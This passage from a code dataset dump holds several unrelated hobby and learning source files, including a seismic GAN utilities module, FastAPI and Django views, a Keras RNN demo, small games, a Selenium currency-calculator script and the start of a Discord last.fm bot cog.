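        gt_class2[i] = gt_class[i]
    return gt_bbox2, gt_class2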
mask == None: mask = np.ones_like(data)\n size = data.shape\n start_dict = dict(zip(directions, start_missing))\n traces_dict = dict(zip(directions, num_traces))\n for direction in directions:\n start = start_dict[direction]\n trace = traces_dict[direction]\n print(f'{direction} continuous missing traces: {trace}, missing start trace {start}')\n if direction == 'iline':\n assert start < size[2]\n mask[:, :, start:start + trace] = 0\n elif direction == 'xline':\n assert start < size[1]\n mask[:, start:start + trace, :] = 0\n else:\n assert start < size[0]\n mask[start:start + trace, :, :] = 0\n return mask\n\n\ndef normalization(data):\n _range = np.max(data) - np.min(data)\n return (data - np.min(data)) / _range\n\n\ndef normalization_tensor(data):\n _range = torch.max(data) - torch.min(data)\n return (data - torch.min(data)) / _range\n\n\ndef z_score_clip(data):\n z = (data - np.mean(data)) / np.std(data)\n return normalization(np.clip(z, a_min=-3.8, a_max=3.8))\n\n\ndef prediction(model, data, device):\n model.eval()\n data = normalization(data)\n m1, m2, m3 = data.shape\n c1 = (np.ceil(m1 / 16) * 16).astype(np.int)\n c2 = (np.ceil(m2 / 16) * 16).astype(np.int)\n c3 = (np.ceil(m3 / 16) * 16).astype(np.int)\n input_tensor = np.zeros((c1, c2, c3), dtype=np.float32) + 0.5\n input_tensor[:m1, :m2, :m3] = data\n input_tensor = torch.from_numpy(input_tensor)[None, None, :, :, :].to(device)\n if device.type == 'cpu':\n input_tensor = input_tensor.float()\n else:\n input_tensor = input_tensor.half()\n with torch.no_grad():\n result = model(input_tensor).cpu().numpy()[0, 0, :m1, :m2, :m3]\n return result.astype(np.float32)\n\n\ndef get_pseudo_color_img(org_slice, masked_slice, filled_slices):\n org_slice = plt.get_cmap('seismic')(org_slice)[:, :, :-1]\n masked_slice = plt.get_cmap('seismic')(masked_slice)[:, :, :-1]\n filled_slices = plt.get_cmap('seismic')(filled_slices)[:, :, :-1]\n return org_slice, masked_slice, filled_slices\n\n\ndef calculate_missing_ratio(mask):\n nomasked = np.sum((mask == 1).astype(np.float32))\n masked = np.sum((mask == 0).astype(np.float32))\n return masked / (nomasked + masked)\n\n\nif __name__=='__main__':\n #mask = discrete_missing(np.random.normal(size = (192, 64, 240)), proportions=(0.5,), directions=('iline',), show_slices=(-16,))\n mask = continuous_missing(np.random.normal(size = (192, 64, 240)), num_traces=(40,), directions=('iline',), start_missing=(100,))","repo_name":"douyimin/MDA_GAN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"95"} +{"seq_id":"32034965087","text":"\"\"\"Routes for card\"\"\"\n\nfrom fastapi import APIRouter\n\ncard_router = APIRouter()\n\n\n@card_router.get(\"/\", status_code=200)\nasync def get_all_by_collection(user_id: str, collection_id: str):\n \"\"\"Route for getting all cards by collection_id\"\"\"\n\n return {\n \"userId\": user_id,\n \"collectionId\": collection_id\n }\n\n\n@card_router.get(\"/{card_id}\", status_code=200)\nasync def get_by_id(user_id: str, collection_id: str, card_id: str):\n \"\"\"Route for getting card by card_id\"\"\"\n\n return {\n \"userId\": user_id,\n \"collectionId\": collection_id,\n \"cardId\": card_id\n }\n\n\n@card_router.post(\"/\", status_code=201)\nasync def create():\n \"\"\"Create one or multiple cards\"\"\"\n\n return {\n \"message\": \"success!\"\n 
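Two pitfalls in the utils above: continuous_missing tests if mask == None, which on an actual ndarray broadcasts elementwise and raises "truth value of an array is ambiguous" (discrete_missing already uses is None correctly), and prediction's astype(np.int) fails on NumPy >= 1.24, where the np.int alias was removed. Minimal hedged helpers illustrating both fixes:

import numpy as np

def ensure_mask(data, mask=None):
    # Identity test, not elementwise equality, for the optional-mask idiom.
    return np.ones_like(data) if mask is None else mask

def pad_to_multiple_of_16(m):
    # Builtin int replaces the removed np.int alias.
    return int(np.ceil(m / 16) * 16)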
}\n","repo_name":"joebrentnall25/flash-card-api","sub_path":"src/api/routes/card_routes.py","file_name":"card_routes.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72541917113","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, SimpleRNN\n\n# Data setting\nx = np.array([[1,2,3],[2,3,4],[3,4,5],[4,5,6]])\ny = np.array([4,5,6,7])\n\nx = x.reshape(4, 3, 1)\n\n# Modeling\nmodel = Sequential()\nmodel.add(SimpleRNN(units=10, input_shape=(3, 1)))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n# Compilation & Training\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(x, y, epochs=800, batch_size=3)\n\n# Prediction\nresult = model.predict(np.array([[[5],[6],[7]]]))\nprint(f'prediction for [5 6 7]: {result}')\n# prediction for [5 6 7]: [[7.3158984]]","repo_name":"estela-park/AI_BitCamp","sub_path":"Keras_Modelling/keras34_RNN1.py","file_name":"keras34_RNN1.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8387199303","text":"from src.modules.dosage.model import Dosage\nfrom src.modules.medicine.model import Medicine\nfrom src.utils.logger import logger\nfrom src.utils.response import controller_resp\n\n\ndef get_dosages():\n\ttry:\n\t\tdosages = Dosage.get()\n\t\treturn controller_resp(200, dosages, \"Dosages Fetched\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::get_dosage %s', excp)\n\t\treturn controller_resp(500, None, \"Something went wrong\")\n\ndef get_dosage_byId(id):\n\ttry:\n\t\tdosage = Dosage.get_by_id(id)\n\t\tstatus_code = 200 if dosage else 404\n\t\tmessage = \"Dosage Fetched\" if dosage else \"Dosage Not Found\"\n\t\treturn controller_resp(status_code, dosage, message)\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::get_dosage %s', excp)\n\t\treturn controller_resp(500, None, \"Something went wrong\")\n\ndef __getMed_create_dosage(med, dose_data):\n\tnew_dosage = Dosage.create(data=dose_data, med=med)\n\tfin_dosage = Dosage.set_enddate(dosage=new_dosage)\n\treturn fin_dosage\n\ndef create_dosage(data):\n\ttry:\n\t\tfound_med = Medicine.get_by_id(data[\"medicine\"])\n\t\tif (not found_med):\n\t\t\treturn controller_resp(404, {}, \"Medicine not found\")\n\t\tcreated_dosage = __getMed_create_dosage(found_med, dose_data=data)\n\t\treturn controller_resp(201, created_dosage, \"Dosage Created\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::create_dosage %s', excp)\n\t\treturn controller_resp(500, None, 'Something went wrong')\n\ndef create_medicine_dosage(data):\n\ttry:\n\t\tnew_medicine = Medicine.create(data=data[\"medicine\"])\n\t\tcreated_dosage = __getMed_create_dosage(new_medicine, dose_data=data)\n\t\treturn controller_resp(201, created_dosage, \"Dosage & Medicine Created\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::create_dosage %s', excp)\n\t\treturn controller_resp(500, None, 'Something went wrong')\n","repo_name":"torredefarol24/flask_mongo","sub_path":"src/modules/dosage/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12148825417","text":"\"\"\"\nProject : \nAuthor : Ajeet\nDate : June 9, 2023\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by 
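For the SimpleRNN example above, each sample is a length-3 sequence of scalars, hence the (batch, timesteps, features) = (4, 3, 1) reshape; a prediction input needs the same shape. A small usage note:

import numpy as np

x_new = np.array([5, 6, 7]).reshape(1, 3, 1)  # one sequence, three steps, one feature
# model.predict(x_new) returns shape (1, 1); the script's comment reports ~7.32.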
import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n\ndriver = webdriver.Chrome()\ndriver.get('https://usa.visa.com/support/consumer/travel-support/exchange-rate-calculator.html')\nwait = WebDriverWait(driver, 30)\n\n# click to Accept\nwait.until(EC.element_to_be_clickable((By.XPATH, \"//a[text()='Accept']\"))).click()\n\nshadow_root = driver.find_element(By.XPATH, \"//dm-calculator\").shadow_root\n# enter_amount\nshadow_root.find_element(By.ID, \"input_amount_paid\").send_keys(\"1\")\n\n# from_dropdown\nshadow_root.find_element(By.ID, \"autosuggestinput_from\").click()\nshadow_root.find_element(By.ID, \"listbox-item-157\").click()\n\n# to_dropdown\nshadow_root.find_element(By.ID, \"autosuggestinput_to\").click()\nshadow_root.find_element(By.ID, \"listbox-item-0\").click()\n\n# fee_edit\nshadow_root.find_element(By.CLASS_NAME, 'vs-link-cta.vs-calculator-edit-link').click()\n\nbank_rate = to_dropdown = shadow_root.find_element(By.ID, \"input_bank_rate\")\nbank_rate.send_keys(Keys.CONTROL, 'a')\nbank_rate.send_keys(Keys.BACKSPACE)\nbank_rate.send_keys('0')\n\n# clicks on Calculate Conversion button\nshadow_root.find_elements(By.CSS_SELECTOR, 'div.vs-container')[-1].find_elements(By.TAG_NAME, 'button')[0].click()\nsleep(2)\n\n\n","repo_name":"ajeet214/Web_Scraping_with_Selenium","sub_path":"usa_visa_com.py","file_name":"usa_visa_com.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"36786145231","text":"#------------------------------------------------------------------------\n#\n# Battleships\n#\n#------------------------------------------------------------------------\n\nimport random\n\nclass Grid():\n\n def __init__(self):\n self.game_grid = []\n self.player_view_grid = []\n self.grid_size = 10\n self.grid_rank = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n\n def init_grid(self):\n\n for gridY in range(self.grid_size):\n grid_row = []\n\n for gridX in range(self.grid_size):\n grid_row.append(' - ')\n\n self.game_grid.append(grid_row)\n\n def print_grid(self):\n print(' 1 2 3 4 5 6 7 8 9 10')\n\n for gridX in range(len(self.game_grid)):\n print(self.grid_rank[gridX], end='')\n\n for gridY in range(len(self.game_grid)):\n print(self.game_grid[gridX][gridY], end='')\n\n print('')\n\n def print_player_view_grid(self):\n print(' 1 2 3 4 5 6 7 8 9 10')\n\n for gridX in range(len(self.player_view_grid)):\n print(self.grid_rank[gridX], end='')\n\n for gridY in range(len(self.player_view_grid)):\n print(self.player_view_grid[gridX][gridY], end='')\n\n print('')\n\n\nclass Ship():\n\n def __init__(self):\n self.ships = [5, 4, 3, 3, 2, 2]\n\n def max_random_place(self, grid_size, ship_length):\n return random.randrange(0, (grid_size - ship_length))\n\n def random_x_or_y(self):\n x_or_y = random.randint(0, 1)\n if x_or_y == 0:\n return 'x'\n return 'y'\n\n def place_ships(self, grid):\n grid_length = len(grid)\n\n for ship in self.ships:\n\n for n in range(10000):\n print('n: ',n)\n\n randomXY = self.random_x_or_y()\n random_grid_space = random.randrange(grid_length)\n start_point = self.max_random_place(grid_length, ship)\n\n if randomXY == 'y':\n spaces_free = True\n\n # checks spaces are free and that there is a space gap on same axis\n for ship_square in range(ship + 1):\n square = grid[start_point + 
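In the Visa calculator script above, bank_rate = to_dropdown = shadow_root.find_element(...) looks like a leftover double assignment — only bank_rate is used. The select-all-then-type pattern it applies is worth a helper; a hedged sketch (Keys.CONTROL works on Windows/Linux; macOS would need Keys.COMMAND):

from selenium.webdriver.common.keys import Keys

def overwrite_field(element, text):
    element.send_keys(Keys.CONTROL, 'a')  # select existing content
    element.send_keys(Keys.BACKSPACE)     # delete it
    element.send_keys(text)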
ship_square][random_grid_space]\n if square != ' - ':\n spaces_free = False\n\n if spaces_free:\n for ship_square in range(ship):\n grid[start_point + ship_square][random_grid_space] = ' S' + str(ship)\n\n elif spaces_free == False:\n continue\n\n break\n\n\n if randomXY == 'x':\n spaces_free = True\n\n # checks spaces are free and that there is a space gap on same axis\n for ship_square in range(ship + 1):\n square = grid[random_grid_space][start_point + ship_square]\n if square != ' - ':\n spaces_free = False\n\n if spaces_free:\n for ship_square in range(ship):\n grid[random_grid_space][start_point + ship_square] = ' S' + str(ship)\n\n elif spaces_free == False:\n continue\n\n break\n\n\n\n\n\n\n\n\n\n\n\ngame = Grid()\nship = Ship()\ngame.init_grid()\ngame.player_view_grid = list(game.game_grid)\n\n\nprint('player view')\ngame.print_player_view_grid()\n\n#ship.place_ships(game.game_grid)\ngame.game_grid[0][0] = ' D '\ngame.player_view_grid[0][1]= ' H '\nprint('player view')\ngame.print_player_view_grid()\nprint('game view')\ngame.print_grid()\nprint('player view')\ngame.print_player_view_grid()\nprint(game.david)","repo_name":"Davidprogramming1986/Battleships","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39637927211","text":"def fecha_dia_siguiente(anio, mes, dia):\r\n bisiesto = False\r\n\r\n if anio % 400 == 0:\r\n bisiesto = True\r\n elif anio % 4 == 0:\r\n bisiesto = True\r\n\r\n if mes in (1, 3, 5, 7, 8, 10, 12):\r\n dias_mes = 31\r\n elif mes == 2:\r\n if bisiesto:\r\n dias_mes = 29\r\n else:\r\n dias_mes = 28\r\n else:\r\n dias_mes = 30\r\n if dia < dias_mes:\r\n dia += 1\r\n else:\r\n dia = 1\r\n if mes == 12:\r\n mes = 1\r\n anio += 1\r\n else:\r\n mes += 1\r\n return (anio, mes, dia)\r\n\r\nprint(fecha_dia_siguiente(2020, 12, 30))","repo_name":"gmsmartinez/Python","sub_path":"DIAGRAMACION2/ejercicio12.py","file_name":"ejercicio12.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74414347511","text":"# 1로 만들기\n\"\"\"\n먼저 Tree형식이라고 생각했을 때,\n가능한 모든 경우를 search하지만\n현재 cnt가 지금까지 나온 최소 cnt보다 같거나 큰 경우 (즉, 더 깊이 들어가는 경우) 종료\n-> 약간 가지치기 느낌\n현재 cnt가 작은 경우에서 1이 나오면 min_cnt 변경\n이런 식으로 serach.\n\"\"\"\ndef calc(X, cnt):\n global min_cnt\n if cnt >= min_cnt: return\n if X == 1:\n min_cnt = cnt\n return\n if X % 3 == 0: calc(X // 3, cnt + 1)\n if X % 2 == 0: calc(X // 2, cnt + 1)\n calc(X - 1, cnt + 1)\n\ndef solution():\n X = int(input())\n global min_cnt\n min_cnt = X\n calc(X, 0)\n print(min_cnt)\n\nsolution()\n","repo_name":"bob8dod/Preparing_CodingTest","sub_path":"BaekJoon/#1463.py","file_name":"#1463.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69953143674","text":"from turtle import Turtle, Screen\r\nfrom paddle import Paddle\r\nfrom brick import Brick\r\nfrom margin import MarginMaker\r\nfrom ball import Ball\r\nimport time\r\nfrom score import Score\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n\r\nwindow = Screen()\r\nwindow.setup(width=WIDTH, height=HEIGHT)\r\nwindow.title('Breakout')\r\nwindow.bgcolor('black')\r\nwindow.tracer(0) # Set animation delay to 0\r\n\r\nmargin = MarginMaker(WIDTH, HEIGHT)\r\n\r\npad = Paddle(WIDTH)\r\n\r\nwindow.listen()\r\nwindow.onkeypress(pad.left, \"Left\")\r\nwindow.onkeypress(pad.right, 
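Two notes on the records above. Battleships copies the board with list(game.game_grid), a shallow copy: both grids share the same row lists, so every mark leaks into the other grid (exactly what its demo prints show), and the final print(game.david) is an AttributeError left in. A per-row copy fixes the aliasing:

game.player_view_grid = [row[:] for row in game.game_grid]

And for the #1463 solver, the pruned recursion works, but the standard bottom-up DP is linear, iterative, and needs no recursion-limit tricks (an alternative technique, not the author's):

def min_ops_to_one(x):
    dp = [0] * (x + 1)
    for i in range(2, x + 1):
        dp[i] = dp[i - 1] + 1                   # subtract one
        if i % 2 == 0:
            dp[i] = min(dp[i], dp[i // 2] + 1)  # divide by two
        if i % 3 == 0:
            dp[i] = min(dp[i], dp[i // 3] + 1)  # divide by three
    return dp[x]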
\"Right\")\r\n\r\nbricks = Brick(WIDTH, HEIGHT)\r\nbricks.bake_bricks()\r\n\r\nball = Ball()\r\nball.start(pad.xcor(), pad.ycor()+20)\r\nheart = Score()\r\n\r\nloop = True\r\n\r\nwhile loop:\r\n time.sleep(ball.speed)\r\n# time.sleep(.3)\r\n ball.move()\r\n\r\n visible_br = []\r\n for br in bricks.br_list:\r\n # brick collision\r\n if br[0].isvisible():\r\n visible_br.append(br)\r\n if 10 < ball.distance(br[0]) < 35:\r\n bricks.brick_process(index=bricks.br_list.index(br))\r\n ball.horizontal_collision()\r\n # Win Mechanism\r\n if len(visible_br) == 0:\r\n heart.lose_win(\"Hooray \\n You Won!\")\r\n loop = False\r\n\r\n # vertical wall collision\r\n if ball.xcor() >= 360 or ball.xcor() <= -360:\r\n ball.vertical_collision()\r\n\r\n # ceiling collision\r\n if ball.ycor() >= 260:\r\n ball.horizontal_collision()\r\n\r\n # Pad collision\r\n if ball.distance(pad) < 50 and -250 < ball.ycor() < -230:\r\n ball.horizontal_collision()\r\n # ball miss and losing mechanism\r\n elif ball.ycor() < -400:\r\n ball.start(pad.xcor(), pad.ycor()+20)\r\n hearts_num = heart.miss()\r\n if hearts_num == 0:\r\n bricks.clear()\r\n heart.lose_win(\"Game Over\")\r\n loop = False\r\n\r\n window.update() # Update the screen after each frame\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"Id-Dark-Dragon/Python-Mini-Games","sub_path":"2-Breakout/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34109495707","text":"import unittest\n\nfrom yabc import transaction\nfrom yabc.formats import coinbasettr\n\n\nclass CoinbaseTTRCsvTest(unittest.TestCase):\n def setUp(self) -> None:\n self.filename = \"testdata/coinbase/UsTaxTransactionsReport.csv\"\n\n def test_load_coinbasettr(self):\n \"\"\" Test that loading does not raise\n \"\"\"\n with open(self.filename) as f:\n coinbasettr.CoinbaseTTRParser(csv_content=f)\n parser = coinbasettr.CoinbaseTTRParser(filename=self.filename)\n parser.cleanup()\n\n def test_loading_sample(self):\n with open(self.filename) as f:\n parser = coinbasettr.CoinbaseTTRParser(f)\n txs = [i for i in parser]\n for tx in txs:\n self.assertEqual(tx.source, \"coinbase\")\n self.assertEqual(len(txs), 8)\n buys = [i for i in txs if i.operation == transaction.Operation.BUY]\n sales = [i for i in txs if i.operation == transaction.Operation.SELL]\n self.assertEqual(len(buys), 7)\n self.assertEqual(len(sales), 1)\n","repo_name":"robertkarl/yabc","sub_path":"tests/formats/test_coinbasettr.py","file_name":"test_coinbasettr.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"35348302572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef func_h(x0, x1, tau):\n if(min(tau) < 0 or max(tau) > 20):\n print('tau has to be in [0,20] but is ', tau)\n return 0\n return 1 / (1 + x0 * tau + (x1 * tau) * (x1 * tau))\n\n\ndef fitness(vector):\n x0 = vector[0]\n x1 = vector[1]\n tau = np.linspace(0, 20, 20)\n w = [1, 1, 1]\n value = 0\n gam1 = gamma1(x0, x1, tau)\n gam2 = gamma2(x0, x1, tau)\n gam3 = gamma3(x0, x1, tau)\n value += sum(gam1[gam1>0]*gam1[gam1>0])\n value += sum(gam2[gam2>0]*gam2[gam2>0])\n value += sum(gam3[gam3>0]*gam3[gam3>0])\n return value\n\ndef gamma1(x0, x1, tau):\n t = tau[tau < 10]\n return (func_h(x0, x1, t) - 1.04)\n # im buch ist es so rum:\n # return (1.04 - func_h(x0, x1, t))\n\ndef gamma2(x0, x1, tau):\n t = tau[tau >= 10]\n return (func_h(x0, x1, 
t) - 0.4)\n\ndef gamma3(x0, x1, tau):\n t = tau[tau <= 5]\n return (0.8 - func_h(x0, x1, t))\n\n","repo_name":"ferdkuh/nia-2017","sub_path":"de/constrained_problem.py","file_name":"constrained_problem.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5657586362","text":"# -*- coding: Latin-1 -*-\nimport pandas as pd\nfrom relation_extract import ERE\n\n\ndef read_write():\n \"\"\"\n read texts from the dataset and write result into submission file\n \"\"\"\n df = pd.read_csv('data/icdm_contest_data.csv', encoding='utf_8_sig')\n result_list = []\n for i in range(len(df['content'])):\n ERE1 = ERE(df['content'][i])\n for ere in ERE1:\n result_dict = {}\n result_dict['industry'] = df['industry'][i]\n result_dict['index'] = df['index'][i]\n result_dict['s1'] = ere[0]\n result_dict['r'] = ere[1]\n result_dict['s2'] = ere[2]\n result_list.append(result_dict)\n\n df2 = pd.DataFrame(result_list, columns=['industry', 'index', 's1', 'r', 's2'])\n df2.to_csv('data/best_now2.csv', encoding='utf_8_sig', index=False)\n\n\nif __name__ == '__main__':\n read_write()\n","repo_name":"brsmsg/ICDM2019-KG-Contest","sub_path":"read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"10471960065","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\n\nfrom bug_app.models import Ticket, MyUser\nfrom bug_app.forms import TicketForm, LoginForm, SignUpForm, EditTicketForm\nfrom bug_project import settings\n\n# Create your views here.\n\ndef index(request):\n new_tickets = Ticket.objects.filter(status=\"New\")\n tickets_in_progress = Ticket.objects.filter(status=\"In Progress\")\n invalid_tickets = Ticket.objects.filter(status=\"Invalid\")\n done_tickets = Ticket.objects.filter(status=\"Done\")\n return render(\n request, 'index.htm',\n {\n 'new_tickets': new_tickets, \n 'tickets_in_progress': tickets_in_progress, \n 'invalid_tickets': invalid_tickets, \n 'done_tickets': done_tickets\n })\n\ndef loginview(request):\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(request, username=data['username'], password=data['password']\n )\n if user:\n login(request, user)\n return HttpResponseRedirect(\n request.GET.get('next', reverse('homepage'))\n )\n form = LoginForm()\n return render(request, 'generic_form.htm', {'form':form})\n\ndef logoutview(request):\n logout(request)\n return HttpResponseRedirect(reverse('homepage'))\n\n@login_required\ndef ticket_edit(request, id):\n file = Ticket.objects.get(id=id)\n if request.method == \"POST\":\n form = EditTicketForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n file.title = data['title']\n file.description = data['description']\n file.status = data['status']\n file.assigned = data['assigned']\n file.completed = data['completed']\n file.save()\n return HttpResponseRedirect(reverse('ticket_detail', args=(id,)))\n\n form = EditTicketForm(initial={\n 'title': file.title,\n 'description': file.description,\n })\n return render(request, \"generic_form.htm\", {'form': form})\n\ndef signupview(request):\n if request.method == \"POST\":\n form = SignUpForm(request.POST)\n if form.is_valid():\n data = 
form.cleaned_data\n user = MyUser.objects.create_user(\n username=data['username'],\n password=data['password'],\n )\n return HttpResponseRedirect(reverse('homepage'))\n \n form = SignUpForm()\n return render(request, 'generic_form.htm', {'form':form})\n\n@login_required\ndef add_ticket(request):\n html = \"generic_form.htm\"\n if request.method == \"POST\":\n form = TicketForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n Ticket.objects.create(\n title=data['title'],\n description=data['description'],\n filer = request.user\n )\n return HttpResponseRedirect(reverse('homepage'))\n \n form = TicketForm()\n return render(request, html, {\"form\": form})\n\ndef user_view(request, id):\n user = MyUser.objects.get(id=id)\n filed = Ticket.objects.filter(filer=user)\n assigned_user = Ticket.objects.filter(assigned=user)\n completed_user = Ticket.objects.filter(completed=user)\n return render(request,'userpage.htm', \n {'user': user, \n 'filed': filed, \n 'assigned_user': assigned_user, \n 'completed_user': completed_user })\n\n\ndef ticket_detail_view(request, id):\n ticket = Ticket.objects.get(id=id)\n return render(request, 'ticket_detail.htm', {'ticket': ticket})\n\n\n@login_required\ndef assigning_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'In Progress'\n ticket.assigned = request.user\n ticket.completed = None\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail', args=(id,)))\n\n@login_required\ndef completed_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'Done'\n ticket.assigned = None\n ticket.completed = request.user\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail', args=(id,)))\n\n@login_required\ndef invalid_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'Invalid'\n ticket.assigned = None\n ticket.completed = None\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail', args=(id,)))","repo_name":"HyperionCG/Bug-Tracker","sub_path":"bug_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36317622682","text":"class Listy(object):\n def __init__(self, a):\n self.a = a\n\n def elemen_at(self, i):\n if i >= len(self.a) or i < 0:\n return -1\n else:\n return self.a[i]\n\n def __str__(self):\n return str(self.a)\n\n def get_len(self):\n if self.elemen_at(0) == -1:\n return 0\n i = 1\n while self.elemen_at(i) != -1:\n i *= 2\n # backtrack\n while self.elemen_at(i) == -1:\n i -= 1\n\n return i + 1\n\nl = Listy([1, 4, 5, 8, 12])\nprint(l)\nprint(l.elemen_at(3))\nprint(l.get_len())","repo_name":"nderkach/algorithmic-challenges","sub_path":"listy.py","file_name":"listy.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11732007092","text":"#!/usr/bin/env python3\n\"\"\"Lastfm cog\n\nCommunicate with lastfm API to display now playing, number of artist\nscrobbles, top artists, and a number of other features.\n\"\"\"\nimport colorific\nimport discord\nimport json\nimport math\nimport requests\nimport sys\nimport urllib.request\nfrom data import permissions_data, lastfm_data\nfrom discord.ext import commands\n\n# read().splitlines() drops the trailing newlines that readlines() would leave in the keys\nAPI_KEY, API_SECRET = open(\"cogs/api.txt\", \"r\").read().splitlines()\nCOOLDOWN = 420\n\n\ndef get_user_url(user):\n \"\"\"Return hypothetical url of a lastfm username\"\"\"\n url = 
((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method=user.getInfo\" +\n \"&user={}\" +\n \"&api_key={}\" +\n \"&format=json\").format(user, API_KEY))\n\n return url\n\n\ndef get_page_url(method, user, page, results_per_page=1000):\n \"\"\"Return url needed for API request\n\n Given a user and an API method, return the url of the page displaying\n the method's results for that user. For user-only methods.\n \"\"\"\n url = ((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method={}\" +\n \"&user={}\" +\n \"&api_key={}\" +\n \"&limit={}\" +\n \"&page={}\" +\n \"&format=json\").format(method, user, API_KEY,\n results_per_page, page))\n\n return url\n\n\ndef get_page_url_alt(method, user, artist, page, results_per_page=200):\n \"\"\"Same as above, but for artist-dependent methods\"\"\"\n url = ((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method={}\" +\n \"&user={}\" +\n \"&artist={}\" +\n \"&api_key={}\" +\n \"&limit={}\" +\n \"&page={}\" +\n \"&format=json\").format(method, user, artist,\n API_KEY, results_per_page, page))\n\n return url\n\n\ndef is_username(user):\n \"\"\"Return whether a username is valid on lastfm\"\"\"\n user_url = get_user_url(user)\n request = requests.get(user_url)\n\n if request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n try:\n error = parsed_content['error']\n return False\n except KeyError as err:\n return True\n\n return False\n\n\ndef make_recent_tracks_list(parsed_content):\n \"\"\"Given a parsed json page, make a list of recent tracks\"\"\"\n recent_tracks = parsed_content['recenttracks']['track']\n recent_tracks_list = list()\n\n for track in recent_tracks:\n name = track['name']\n artist = track['artist']['#text']\n album = track['album']['#text']\n image = track['image'][3]['#text']\n recent_tracks_list.append((name, artist, album, image))\n\n return recent_tracks_list\n\n\ndef get_last_played(user):\n \"\"\"Get a user's last played track\"\"\"\n method = \"user.getRecentTracks\"\n page_url = get_page_url(method, user, 1, results_per_page=1)\n request = requests.get(page_url)\n\n if request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n recent_tracks_list = make_recent_tracks_list(parsed_content)\n last_played_track = recent_tracks_list[0]\n return last_played_track\n\n return None\n\n\ndef find_playcount(artist_name, parsed_content):\n \"\"\"Find an artist's playcount within a parsed top artists page\"\"\"\n top_artists = parsed_content['topartists']['artist']\n\n for artist in top_artists:\n if artist_name.lower() == artist['name'].lower():\n return artist['playcount']\n\n return None\n\n\ndef get_num_scrobbles_of_artist(user, artist):\n \"\"\"Find number of times user has scrobbled an artist\"\"\"\n method = \"user.getTopArtists\"\n num_scrobbles = 0\n\n page = 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n\n while request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n num_scrobbles = find_playcount(artist, parsed_content)\n if num_scrobbles:\n return num_scrobbles\n elif len(parsed_content['topartists']['artist']) == 1000:\n page += 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n else:\n break\n\n return 0\n\n\ndef 
